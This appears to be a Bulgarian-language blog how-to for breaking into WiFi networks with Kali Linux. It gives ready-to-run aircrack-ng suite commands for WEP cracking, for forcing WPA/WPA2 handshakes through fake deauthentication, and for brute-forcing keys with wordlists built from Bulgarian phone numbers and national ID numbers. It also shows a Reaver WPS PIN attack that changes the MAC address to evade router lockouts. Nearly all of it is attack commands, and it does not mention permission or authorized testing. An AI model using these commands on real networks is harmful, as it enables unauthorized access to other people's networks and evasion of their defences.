Какво е необходимо:
Kali Linux - идва с подходящо компилирано ядро, при другите дистрибуции има проблеми.
WiFi адаптер, който може да влиза в мониторен режим.
Насочена антена. Аз използвам такова /само че с 722n/:
https://bigdanzblog.wordpress.com/2014/02/01/cantenna-can-do/Има и готови скриптове, но те не са особенно приложими, такъв е
#wifite. Аз го използвам само за анализ.
WEP
Най-лесни за разбиване бяха WEP мрежите, но уви вече почти не се срещат ...
#airodump-ng -c 1 --bssid 64:70:02:BB:E1:BA -w cap_file mon0
#aircrack-ng -b MAC_AP FILE*
Когато няма клиенти:
#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 mon0
WPA/WPA2
1. Вкарване на WiFi адаптера във мониторен режим:
airmon-ng start wlan1
2. Aнализирате мрежитe и избирате една. Да насочите антената и чак тогава да преминете към разбиване на мрежата. Аз използвам
#wifite за това, след като съм избрал мрежа:
#airodump-ng -c 1 mon0.
3. Пускане на запис
#airodump-ng -c 1 --bssid 64:70:02:BB:E1:BA -w cap_file mon0
4. Пускане на фалшива деауторизация.
#aireplay-ng -0 1 -a MAC_AP -c MAC_CL mon0
Гледайте предния прозорец в горния десен ъгъл, трябва да се появи "WPA handshake", това означава че се ауторизационните пакети са прихванати, CTRL+C и преминаваме към разбиване.
WPA/WPA2 Мрежите са трудни за разбиване от криптографска гледна точка, За да се разбие ключа е необходимо да се използва голяма изчислителна мошност - GPU на видеокартите се справя с тази задача:
http://blog.codinghorror.com/speed-hashing/http://phreaklets.blogspot.bg/2013/06/cracking-wpa2-psk-passwords-with.htmlНо често паролите са телефонни номера и ЕГН-та.
Ето един Perl генератор, който върши добра работа:
ftp://ftp.mut.ac.th/pub/Security/wg.plGSM:
perl ./wg.pl -а 08 -l 8 -u 8 -v 9876543210 | aircrack-ng -e linksys -w - psk-01.cap
BTK:
perl ./wg.pl -a 052 -l 6 -u 6 -v 0123456789 | aircrack-ng -e linksys -w - psk-01.cap
Всички числа 8–10 цифрени.
perl ./wg.pl -l 8 -u 10 -v 0123456789 | aircrack-ng -e linksys -w - psk-01.cap
WPS
Най-популярната атака е WPS Brute Force - налучкване на двата 4 цифрени пина. След успех на атаката получаваме passphrase.
При включен WPS, рутерите бяха лесна жертва /TP-Link рутерите нямаха никаква защита/, но вече почти всички имат защита и след няколко проби на пинове, имат голям таймаут или блокират адреса на адаптера с който атакуваме. Има модифицирана версия на Reaver, която променя мак адреса при всяка атака:
https://github.com/gabrielrcouto/reaver-wps#reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv